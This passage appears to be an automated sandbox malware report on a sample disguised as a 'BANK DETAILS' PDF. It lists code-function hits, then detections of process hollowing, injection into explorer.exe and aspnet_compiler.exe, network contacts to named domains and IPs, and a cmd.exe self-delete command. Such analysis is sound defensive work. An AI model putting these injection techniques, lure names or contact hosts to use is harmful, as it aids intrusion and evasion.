          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 16_2_03797016 mov eax, dword ptr fs:[00000030h]16_2_03797016
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 16_2_03797016 mov eax, dword ptr fs:[00000030h]16_2_03797016
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 16_2_037140E1 mov eax, dword ptr fs:[00000030h]16_2_037140E1
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 16_2_037140E1 mov eax, dword ptr fs:[00000030h]16_2_037140E1
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 16_2_037140E1 mov eax, dword ptr fs:[00000030h]16_2_037140E1
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 16_2_0373B8E4 mov eax, dword ptr fs:[00000030h]16_2_0373B8E4
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 16_2_0373B8E4 mov eax, dword ptr fs:[00000030h]16_2_0373B8E4
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 16_2_037158EC mov eax, dword ptr fs:[00000030h]16_2_037158EC
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 16_2_037AB8D0 mov eax, dword ptr fs:[00000030h]16_2_037AB8D0
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 16_2_037AB8D0 mov ecx, dword ptr fs:[00000030h]16_2_037AB8D0
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 16_2_037AB8D0 mov eax, dword ptr fs:[00000030h]16_2_037AB8D0
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 16_2_037AB8D0 mov eax, dword ptr fs:[00000030h]16_2_037AB8D0
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 16_2_037AB8D0 mov eax, dword ptr fs:[00000030h]16_2_037AB8D0
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 16_2_037AB8D0 mov eax, dword ptr fs:[00000030h]16_2_037AB8D0
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 16_2_0374F0BF mov ecx, dword ptr fs:[00000030h]16_2_0374F0BF
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 16_2_0374F0BF mov eax, dword ptr fs:[00000030h]16_2_0374F0BF
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 16_2_0374F0BF mov eax, dword ptr fs:[00000030h]16_2_0374F0BF
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 16_2_037420A0 mov eax, dword ptr fs:[00000030h]16_2_037420A0
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 16_2_037420A0 mov eax, dword ptr fs:[00000030h]16_2_037420A0
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 16_2_037420A0 mov eax, dword ptr fs:[00000030h]16_2_037420A0
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 16_2_037420A0 mov eax, dword ptr fs:[00000030h]16_2_037420A0
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 16_2_037420A0 mov eax, dword ptr fs:[00000030h]16_2_037420A0
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 16_2_037420A0 mov eax, dword ptr fs:[00000030h]16_2_037420A0
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 16_2_037590AF mov eax, dword ptr fs:[00000030h]16_2_037590AF
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 16_2_03719080 mov eax, dword ptr fs:[00000030h]16_2_03719080
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 16_2_03793884 mov eax, dword ptr fs:[00000030h]16_2_03793884
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 16_2_03793884 mov eax, dword ptr fs:[00000030h]16_2_03793884
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 16_2_0372FF60 mov eax, dword ptr fs:[00000030h]16_2_0372FF60
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 16_2_037E8F6A mov eax, dword ptr fs:[00000030h]16_2_037E8F6A
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 16_2_0372EF40 mov eax, dword ptr fs:[00000030h]16_2_0372EF40
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 16_2_0374E730 mov eax, dword ptr fs:[00000030h]16_2_0374E730
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 16_2_0373B73D mov eax, dword ptr fs:[00000030h]16_2_0373B73D
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 16_2_0373B73D mov eax, dword ptr fs:[00000030h]16_2_0373B73D
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 16_2_03714F2E mov eax, dword ptr fs:[00000030h]16_2_03714F2E
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 16_2_03714F2E mov eax, dword ptr fs:[00000030h]16_2_03714F2E
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 16_2_0373F716 mov eax, dword ptr fs:[00000030h]16_2_0373F716
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 16_2_037AFF10 mov eax, dword ptr fs:[00000030h]16_2_037AFF10
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 16_2_037AFF10 mov eax, dword ptr fs:[00000030h]16_2_037AFF10
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 16_2_037E070D mov eax, dword ptr fs:[00000030h]16_2_037E070D
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 16_2_037E070D mov eax, dword ptr fs:[00000030h]16_2_037E070D
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 16_2_0374A70E mov eax, dword ptr fs:[00000030h]16_2_0374A70E
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 16_2_0374A70E mov eax, dword ptr fs:[00000030h]16_2_0374A70E
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 16_2_037537F5 mov eax, dword ptr fs:[00000030h]16_2_037537F5
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 16_2_03728794 mov eax, dword ptr fs:[00000030h]16_2_03728794
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 16_2_03797794 mov eax, dword ptr fs:[00000030h]16_2_03797794
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 16_2_03797794 mov eax, dword ptr fs:[00000030h]16_2_03797794
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 16_2_03797794 mov eax, dword ptr fs:[00000030h]16_2_03797794
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 16_2_0373AE73 mov eax, dword ptr fs:[00000030h]16_2_0373AE73
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 16_2_0373AE73 mov eax, dword ptr fs:[00000030h]16_2_0373AE73
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 16_2_0373AE73 mov eax, dword ptr fs:[00000030h]16_2_0373AE73
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 16_2_0373AE73 mov eax, dword ptr fs:[00000030h]16_2_0373AE73
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 16_2_0373AE73 mov eax, dword ptr fs:[00000030h]16_2_0373AE73
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 16_2_0372766D mov eax, dword ptr fs:[00000030h]16_2_0372766D
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 16_2_03727E41 mov eax, dword ptr fs:[00000030h]16_2_03727E41
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 16_2_03727E41 mov eax, dword ptr fs:[00000030h]16_2_03727E41
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 16_2_03727E41 mov eax, dword ptr fs:[00000030h]16_2_03727E41
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 16_2_03727E41 mov eax, dword ptr fs:[00000030h]16_2_03727E41
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 16_2_03727E41 mov eax, dword ptr fs:[00000030h]16_2_03727E41
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 16_2_03727E41 mov eax, dword ptr fs:[00000030h]16_2_03727E41
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 16_2_037DAE44 mov eax, dword ptr fs:[00000030h]16_2_037DAE44
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 16_2_037DAE44 mov eax, dword ptr fs:[00000030h]16_2_037DAE44
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 16_2_037CFE3F mov eax, dword ptr fs:[00000030h]16_2_037CFE3F
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 16_2_0371E620 mov eax, dword ptr fs:[00000030h]16_2_0371E620
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 16_2_0374A61C mov eax, dword ptr fs:[00000030h]16_2_0374A61C
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 16_2_0374A61C mov eax, dword ptr fs:[00000030h]16_2_0374A61C
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 16_2_0371C600 mov eax, dword ptr fs:[00000030h]16_2_0371C600
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 16_2_0371C600 mov eax, dword ptr fs:[00000030h]16_2_0371C600
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 16_2_0371C600 mov eax, dword ptr fs:[00000030h]16_2_0371C600
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 16_2_03748E00 mov eax, dword ptr fs:[00000030h]16_2_03748E00
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 16_2_037D1608 mov eax, dword ptr fs:[00000030h]16_2_037D1608
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 16_2_037276E2 mov eax, dword ptr fs:[00000030h]16_2_037276E2
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 16_2_037416E0 mov ecx, dword ptr fs:[00000030h]16_2_037416E0
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 16_2_037E8ED6 mov eax, dword ptr fs:[00000030h]16_2_037E8ED6
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 16_2_03758EC7 mov eax, dword ptr fs:[00000030h]16_2_03758EC7
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 16_2_037436CC mov eax, dword ptr fs:[00000030h]16_2_037436CC
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 16_2_037CFEC0 mov eax, dword ptr fs:[00000030h]16_2_037CFEC0
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 16_2_037E0EA5 mov eax, dword ptr fs:[00000030h]16_2_037E0EA5
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 16_2_037E0EA5 mov eax, dword ptr fs:[00000030h]16_2_037E0EA5
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 16_2_037E0EA5 mov eax, dword ptr fs:[00000030h]16_2_037E0EA5
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 16_2_037946A7 mov eax, dword ptr fs:[00000030h]16_2_037946A7
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 16_2_037AFE87 mov eax, dword ptr fs:[00000030h]16_2_037AFE87
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 16_2_0373C577 mov eax, dword ptr fs:[00000030h]16_2_0373C577
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 16_2_0373C577 mov eax, dword ptr fs:[00000030h]16_2_0373C577
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 16_2_03737D50 mov eax, dword ptr fs:[00000030h]16_2_03737D50
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 16_2_03753D43 mov eax, dword ptr fs:[00000030h]16_2_03753D43
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 16_2_03793540 mov eax, dword ptr fs:[00000030h]16_2_03793540
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 16_2_037C3D40 mov eax, dword ptr fs:[00000030h]16_2_037C3D40
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 16_2_0371AD30 mov eax, dword ptr fs:[00000030h]16_2_0371AD30
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 16_2_037DE539 mov eax, dword ptr fs:[00000030h]16_2_037DE539
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 16_2_03723D34 mov eax, dword ptr fs:[00000030h]16_2_03723D34
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 16_2_03723D34 mov eax, dword ptr fs:[00000030h]16_2_03723D34
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 16_2_03723D34 mov eax, dword ptr fs:[00000030h]16_2_03723D34
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 16_2_03723D34 mov eax, dword ptr fs:[00000030h]16_2_03723D34
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 16_2_03723D34 mov eax, dword ptr fs:[00000030h]16_2_03723D34
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 16_2_03723D34 mov eax, dword ptr fs:[00000030h]16_2_03723D34
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 16_2_03723D34 mov eax, dword ptr fs:[00000030h]16_2_03723D34
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 16_2_03723D34 mov eax, dword ptr fs:[00000030h]16_2_03723D34
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 16_2_03723D34 mov eax, dword ptr fs:[00000030h]16_2_03723D34
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 16_2_03723D34 mov eax, dword ptr fs:[00000030h]16_2_03723D34
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 16_2_03723D34 mov eax, dword ptr fs:[00000030h]16_2_03723D34
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 16_2_03723D34 mov eax, dword ptr fs:[00000030h]16_2_03723D34
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 16_2_03723D34 mov eax, dword ptr fs:[00000030h]16_2_03723D34
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 16_2_037E8D34 mov eax, dword ptr fs:[00000030h]16_2_037E8D34
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 16_2_0379A537 mov eax, dword ptr fs:[00000030h]16_2_0379A537
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 16_2_03744D3B mov eax, dword ptr fs:[00000030h]16_2_03744D3B
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 16_2_03744D3B mov eax, dword ptr fs:[00000030h]16_2_03744D3B
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 16_2_03744D3B mov eax, dword ptr fs:[00000030h]16_2_03744D3B
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 16_2_037C8DF1 mov eax, dword ptr fs:[00000030h]16_2_037C8DF1
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 16_2_0372D5E0 mov eax, dword ptr fs:[00000030h]16_2_0372D5E0
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 16_2_0372D5E0 mov eax, dword ptr fs:[00000030h]16_2_0372D5E0
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 16_2_037DFDE2 mov eax, dword ptr fs:[00000030h]16_2_037DFDE2
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 16_2_037DFDE2 mov eax, dword ptr fs:[00000030h]16_2_037DFDE2
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 16_2_037DFDE2 mov eax, dword ptr fs:[00000030h]16_2_037DFDE2
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 16_2_037DFDE2 mov eax, dword ptr fs:[00000030h]16_2_037DFDE2
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 16_2_03796DC9 mov eax, dword ptr fs:[00000030h]16_2_03796DC9
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 16_2_03796DC9 mov eax, dword ptr fs:[00000030h]16_2_03796DC9
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 16_2_03796DC9 mov eax, dword ptr fs:[00000030h]16_2_03796DC9
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 16_2_03796DC9 mov ecx, dword ptr fs:[00000030h]16_2_03796DC9
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 16_2_03796DC9 mov eax, dword ptr fs:[00000030h]16_2_03796DC9
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 16_2_03796DC9 mov eax, dword ptr fs:[00000030h]16_2_03796DC9
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 16_2_03741DB5 mov eax, dword ptr fs:[00000030h]16_2_03741DB5
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 16_2_03741DB5 mov eax, dword ptr fs:[00000030h]16_2_03741DB5
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 16_2_03741DB5 mov eax, dword ptr fs:[00000030h]16_2_03741DB5
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 16_2_037E05AC mov eax, dword ptr fs:[00000030h]16_2_037E05AC
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 16_2_037E05AC mov eax, dword ptr fs:[00000030h]16_2_037E05AC
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 16_2_037435A1 mov eax, dword ptr fs:[00000030h]16_2_037435A1
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 16_2_0374FD9B mov eax, dword ptr fs:[00000030h]16_2_0374FD9B
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 16_2_0374FD9B mov eax, dword ptr fs:[00000030h]16_2_0374FD9B
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 16_2_03742581 mov eax, dword ptr fs:[00000030h]16_2_03742581
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 16_2_03742581 mov eax, dword ptr fs:[00000030h]16_2_03742581
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 16_2_03742581 mov eax, dword ptr fs:[00000030h]16_2_03742581
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 16_2_03742581 mov eax, dword ptr fs:[00000030h]16_2_03742581
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 16_2_03712D8A mov eax, dword ptr fs:[00000030h]16_2_03712D8A
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 16_2_03712D8A mov eax, dword ptr fs:[00000030h]16_2_03712D8A
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 16_2_03712D8A mov eax, dword ptr fs:[00000030h]16_2_03712D8A
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 16_2_03712D8A mov eax, dword ptr fs:[00000030h]16_2_03712D8A
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 16_2_03712D8A mov eax, dword ptr fs:[00000030h]16_2_03712D8A
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 16_2_0373746D mov eax, dword ptr fs:[00000030h]16_2_0373746D
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 16_2_037AC450 mov eax, dword ptr fs:[00000030h]16_2_037AC450
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 16_2_037AC450 mov eax, dword ptr fs:[00000030h]16_2_037AC450
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 16_2_0374A44B mov eax, dword ptr fs:[00000030h]16_2_0374A44B
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 16_2_0374BC2C mov eax, dword ptr fs:[00000030h]16_2_0374BC2C
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 16_2_037E740D mov eax, dword ptr fs:[00000030h]16_2_037E740D
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 16_2_037E740D mov eax, dword ptr fs:[00000030h]16_2_037E740D
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 16_2_037E740D mov eax, dword ptr fs:[00000030h]16_2_037E740D
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 16_2_03796C0A mov eax, dword ptr fs:[00000030h]16_2_03796C0A
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 16_2_03796C0A mov eax, dword ptr fs:[00000030h]16_2_03796C0A
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 16_2_03796C0A mov eax, dword ptr fs:[00000030h]16_2_03796C0A
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 16_2_03796C0A mov eax, dword ptr fs:[00000030h]16_2_03796C0A
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 16_2_037D1C06 mov eax, dword ptr fs:[00000030h]16_2_037D1C06
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 16_2_037D1C06 mov eax, dword ptr fs:[00000030h]16_2_037D1C06
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 16_2_037D1C06 mov eax, dword ptr fs:[00000030h]16_2_037D1C06
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 16_2_037D1C06 mov eax, dword ptr fs:[00000030h]16_2_037D1C06
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 16_2_037D1C06 mov eax, dword ptr fs:[00000030h]16_2_037D1C06
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 16_2_037D1C06 mov eax, dword ptr fs:[00000030h]16_2_037D1C06
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 16_2_037D1C06 mov eax, dword ptr fs:[00000030h]16_2_037D1C06
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 16_2_037D1C06 mov eax, dword ptr fs:[00000030h]16_2_037D1C06
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 16_2_037D1C06 mov eax, dword ptr fs:[00000030h]16_2_037D1C06
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 16_2_037D1C06 mov eax, dword ptr fs:[00000030h]16_2_037D1C06
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 16_2_037D1C06 mov eax, dword ptr fs:[00000030h]16_2_037D1C06
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 16_2_037D1C06 mov eax, dword ptr fs:[00000030h]16_2_037D1C06
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 16_2_037D1C06 mov eax, dword ptr fs:[00000030h]16_2_037D1C06
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 16_2_037D1C06 mov eax, dword ptr fs:[00000030h]16_2_037D1C06
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 16_2_037D14FB mov eax, dword ptr fs:[00000030h]16_2_037D14FB
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 16_2_03796CF0 mov eax, dword ptr fs:[00000030h]16_2_03796CF0
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 16_2_03796CF0 mov eax, dword ptr fs:[00000030h]16_2_03796CF0
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 16_2_03796CF0 mov eax, dword ptr fs:[00000030h]16_2_03796CF0
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 16_2_037E8CD6 mov eax, dword ptr fs:[00000030h]16_2_037E8CD6
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 16_2_0372849B mov eax, dword ptr fs:[00000030h]16_2_0372849B
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeProcess queried: DebugPortJump to behavior
          Source: C:\Windows\SysWOW64\WWAHost.exeProcess queried: DebugPortJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 5_2_00409B40 LdrLoadDll,5_2_00409B40
          Source: C:\Users\user\Desktop\BANK DETAILS-25012022-971332pdf.exeMemory allocated: page read and write | page guardJump to behavior

          HIPS / PFW / Operating System Protection Evasion

          barindex
          System process connects to network (likely due to code injection or exploit)
          Source: C:\Windows\explorer.exeDomain query: www.quanqiu55555.com
          Source: C:\Windows\explorer.exeDomain query: www.waktuk.com
          Source: C:\Windows\explorer.exeDomain query: www.piqqekqqbpjpajbzvvfqapwr.store
          Source: C:\Windows\explorer.exeDomain query: www.kuanghong.club
          Source: C:\Windows\explorer.exeDomain query: www.istemnetwork.com
          Source: C:\Windows\explorer.exeNetwork Connect: 217.160.0.98 80Jump to behavior
          Source: C:\Windows\explorer.exeNetwork Connect: 38.143.0.82 80Jump to behavior
          Source: C:\Windows\explorer.exeNetwork Connect: 192.0.78.25 80Jump to behavior
          Source: C:\Windows\explorer.exeDomain query: www.janhenningsen.com
          Source: C:\Windows\explorer.exeNetwork Connect: 142.250.184.243 80Jump to behavior
          Source: C:\Windows\explorer.exeDomain query: www.vaughnediting.com
          Source: C:\Windows\explorer.exeNetwork Connect: 95.179.246.125 80Jump to behavior
          Source: C:\Windows\explorer.exeDomain query: www.kamchatka-agency.com
          Sample uses process hollowing technique
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeSection unmapped: C:\Windows\SysWOW64\WWAHost.exe base address: 3F0000Jump to behavior
          Maps a DLL or memory area into another process
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeSection loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and writeJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeSection loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and writeJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeSection loaded: unknown target: C:\Windows\SysWOW64\WWAHost.exe protection: execute and read and writeJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeSection loaded: unknown target: C:\Windows\SysWOW64\WWAHost.exe protection: execute and read and writeJump to behavior
          Source: C:\Windows\SysWOW64\WWAHost.exeSection loaded: unknown target: C:\Windows\explorer.exe protection: read writeJump to behavior
          Source: C:\Windows\SysWOW64\WWAHost.exeSection loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and writeJump to behavior
          Writes to foreign memory regions
          Source: C:\Users\user\Desktop\BANK DETAILS-25012022-971332pdf.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe base: 400000Jump to behavior
          Source: C:\Users\user\Desktop\BANK DETAILS-25012022-971332pdf.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe base: 401000Jump to behavior
          Source: C:\Users\user\Desktop\BANK DETAILS-25012022-971332pdf.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe base: F6D008Jump to behavior
          Allocates memory in foreign processes
          Source: C:\Users\user\Desktop\BANK DETAILS-25012022-971332pdf.exeMemory allocated: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe base: 400000 protect: page execute and read and writeJump to behavior
          Injects a PE file into a foreign processes
          Source: C:\Users\user\Desktop\BANK DETAILS-25012022-971332pdf.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe base: 400000 value starts with: 4D5AJump to behavior
          Queues an APC in another process (thread injection)
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeThread APC queued: target process: C:\Windows\explorer.exeJump to behavior
          Modifies the context of a thread in another process (thread injection)
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeThread register set: target process: 3292Jump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeThread register set: target process: 3292Jump to behavior
          Source: C:\Windows\SysWOW64\WWAHost.exeThread register set: target process: 3292Jump to behavior
          Source: C:\Users\user\Desktop\BANK DETAILS-25012022-971332pdf.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeJump to behavior
          Source: C:\Windows\SysWOW64\WWAHost.exeProcess created: C:\Windows\SysWOW64\cmd.exe /c del "C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe"Jump to behavior
          Source: explorer.exe, 00000006.00000000.289110793.0000000001400000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000006.00000000.330247003.0000000001400000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000006.00000000.301639426.0000000001400000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000006.00000000.267234981.0000000001400000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: uProgram Manager
          Source: explorer.exe, 00000006.00000000.289110793.0000000001400000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000006.00000000.291592818.0000000005F40000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000000.330247003.0000000001400000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000006.00000000.301639426.0000000001400000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000006.00000000.267234981.0000000001400000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Shell_TrayWnd
          Source: explorer.exe, 00000006.00000000.289110793.0000000001400000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000006.00000000.330247003.0000000001400000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000006.00000000.301639426.0000000001400000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000006.00000000.267234981.0000000001400000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Progman
          Source: explorer.exe, 00000006.00000000.289110793.0000000001400000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000006.00000000.330247003.0000000001400000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000006.00000000.301639426.0000000001400000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000006.00000000.267234981.0000000001400000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Progmanlock
